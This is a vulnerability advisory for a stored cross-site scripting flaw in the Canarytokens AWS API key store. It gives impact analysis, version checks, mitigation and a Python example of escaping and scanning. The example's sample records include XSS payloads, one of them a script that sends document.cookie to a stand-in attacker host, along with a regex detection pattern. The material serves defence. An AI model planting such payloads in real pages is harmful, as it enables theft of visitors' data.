CVE-2026-13140
Status: Received - Intake
Stored XSS in Thinkst Canarytokens AWS API Key Store

Publication date: 2026-06-24

Last updated on: 2026-06-24

Assigner: 0f2be0ad-3469-4e56-b38f-4eb96719b425

Description
Stored Cross-Site Scripting in the exposed AWS API key store of Thinkst Applied Research Canarytokens. Anonymous exploitation requires knowledge of a random identifier. This issue affects Canarytokens: from Docker tag sha-4116b92cb before sha-f5aa5c4e, from Git commit 4116b92cb before f5aa5c4e.
Affected Vendors & Products
Vendor Product Version / Range
thinkst_applied_research canarytokens From sha-4116b92cb (inc) to sha-f5aa5c4e (exc)
thinkst canarytokens From sha-4116b92cb (exc) to sha-f5aa5c4e (exc)
thinkst canarytokens From 4116b92 (exc) to f5aa5c4e (exc)
CWE
CWE-79: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Compliance Impact

The vulnerability is a Stored Cross-Site Scripting (XSS) issue that allows execution of JavaScript within the victim's browser on the Canarytokens.org domain, limited to extracting details about the targeted AWS API Key Canarytoken.

The impact on confidentiality and integrity is limited, and there are no user sessions on Canarytokens.org, which restricts the attacker's impact.

Given the low severity and limited impact, the vulnerability poses minimal direct risk to compliance with common standards and regulations such as GDPR or HIPAA, which focus on protecting personal and sensitive data.

However, any vulnerability that could potentially expose sensitive information, such as AWS API keys, might indirectly affect compliance if exploited in a broader attack context.

Executive Summary

CVE-2026-13140 is a Stored Cross-Site Scripting (XSS) vulnerability found in the exposed AWS API key store of Thinkst Applied Research's Canarytokens.

The attacker, who must already know the token's random identifier, stores JavaScript in the token's public_location field. When a victim opens the affected page on the Canarytokens.org domain, for example by following a link to it, the stored script executes in the victim's browser.

Because Canarytokens.org does not maintain user sessions, the attacker's ability to cause harm is limited to extracting details about the targeted AWS API Key Canarytoken.

The vulnerability affects Canarytokens from Docker tag sha-4116b92cb (Git commit 4116b92cb) up to, but not including, Docker tag sha-f5aa5c4e (Git commit f5aa5c4e), which carries the fix.

Impact Analysis

This vulnerability allows an attacker to execute JavaScript in the browser of a victim who views the affected AWS API key store page, for example after following a link to it.

The impact is limited because the attacker needs to know a random identifier and user interaction (clicking the link) is required.

The attacker can only extract information related to the targeted AWS API Key Canarytoken, but cannot hijack user sessions or cause broader compromise on Canarytokens.org.

Overall, the vulnerability is considered low severity due to high attack complexity, limited confidentiality and integrity impact, and the need for user interaction.

Detection Guidance

Detection of this vulnerability starts with identifying whether your Canarytokens installation is running a vulnerable version, specifically a build from Docker tag sha-4116b92cb (Git commit 4116b92cb) up to, but not including, Docker tag sha-f5aa5c4e (Git commit f5aa5c4e).

Since the vulnerability is a Stored Cross-Site Scripting (XSS) in the exposed AWS API key store, detection can include checking for the presence of malicious JavaScript in the public_location field of Canarytokens.

You can verify the version of your Canarytokens Docker image by running the command:

  • docker images | grep canarytokens

To check the Git commit if you have the source code, print the checked-out commit and then test whether the fixing commit is an ancestor of it (exit status 0 means the fix is included):

  • git log -1 --format=%H
  • git merge-base --is-ancestor f5aa5c4e HEAD && echo "fix included" || echo "fix missing"

Additionally, inspect the stored tokens for unexpected HTML or JavaScript in the public_location field by querying the database or reviewing token configurations; the field should contain a plain description of where the key was planted, not markup.
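As an added illustration, not Canarytokens' own code, the following Python shows the CWE-79 pattern the summary describes (a public_location value interpolated straight into HTML) beside an escaped rendering, and a heuristic scan of stored records for script-like content in that field. Only the field name public_location comes from the advisory; the record layout, the renderer and the sample records are constructed assumptions.

```python
"""Stored XSS via a 'public_location' field: vulnerable vs. escaped rendering,
plus a heuristic scan of stored records. Added example; not Canarytokens' code.
The field name comes from the advisory; everything else here is assumed."""
import html
import re
from typing import Dict, Iterable, List

# Constructed sample records (not real data). Only record 1 is benign.
SAMPLE_TOKENS: List[Dict[str, str]] = [
    {"token_id": "example-token-1",
     "public_location": "Jenkins build server, rack 4"},
    {"token_id": "example-token-2",
     "public_location": '<script>fetch("https://attacker.example/?c="+document.cookie)</script>'},
    {"token_id": "example-token-3",
     "public_location": '<img src=x onerror="alert(1)">'},
    {"token_id": "example-token-4",
     "public_location": '<a href="javascript:alert(1)">prod</a>'},
]


def render_vulnerable(public_location: str) -> str:
    """CWE-79 pattern: untrusted input placed into the page unescaped.
    Any markup the attacker stored is emitted verbatim and executes."""
    return f'<td class="location">{public_location}</td>'


def render_fixed(public_location: str) -> str:
    """Escape &, <, >, " and ' so the stored value is inert text in HTML
    text content and in quoted attributes. The equivalent fix in a template
    engine is leaving autoescaping on and never marking the value safe."""
    return f'<td class="location">{html.escape(public_location, quote=True)}</td>'


# Heuristic markers of script injection. This is a triage aid, not a parser:
# encoded or split payloads can evade it, and legitimate text may trip it.
_SUSPICIOUS = re.compile(
    r"<\s*script\b"            # <script ...>
    r"|<\s*/\s*script"          # </script>
    r"|javascript\s*:"          # javascript: URLs in href/src
    r"|\bon[a-z]+\s*="          # inline event handlers such as onerror=
    r"|<\s*(iframe|svg|object|embed)\b",
    re.IGNORECASE,
)


def find_suspicious_tokens(tokens: Iterable[Dict[str, str]]) -> List[str]:
    """Return the token_ids whose public_location contains script-like markup,
    in input order. A hit is a reason to review the record, not proof of abuse."""
    return [t["token_id"] for t in tokens
            if _SUSPICIOUS.search(t.get("public_location", ""))]


def script_tag_survives(rendered: str) -> bool:
    """True if rendered HTML still contains a live <script> tag."""
    return re.search(r"<\s*script\b", rendered, re.IGNORECASE) is not None


if __name__ == "__main__":
    payload = SAMPLE_TOKENS[1]["public_location"]
    print("flagged records:", find_suspicious_tokens(SAMPLE_TOKENS))
    print("vulnerable render keeps <script>:", script_tag_survives(render_vulnerable(payload)))
    print("fixed render keeps <script>:     ", script_tag_survives(render_fixed(payload)))
```

The scan is a triage aid for the review step above: a record that matches deserves a look at who created the token and when, but a clean scan does not prove the field was never abused, and escaping on output is only one half of the fix; upgrading to a build at or after sha-f5aa5c4e is the authoritative remediation.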

Mitigation Strategies

The immediate mitigation step is to update your Canarytokens installation to the latest patched version.

For self-hosted installations, this means pulling a Docker image built from commit f5aa5c4e or later (Docker tag sha-f5aa5c4e or newer), which contains the fix.

  • Run: docker pull thinkst/canarytokens:latest

After updating, restart your Canarytokens service to apply the patch.

Until the update is applied, treat links to the AWS API key store page of tokens you did not create yourself as untrusted, and review the public_location field of existing tokens for unexpected markup.
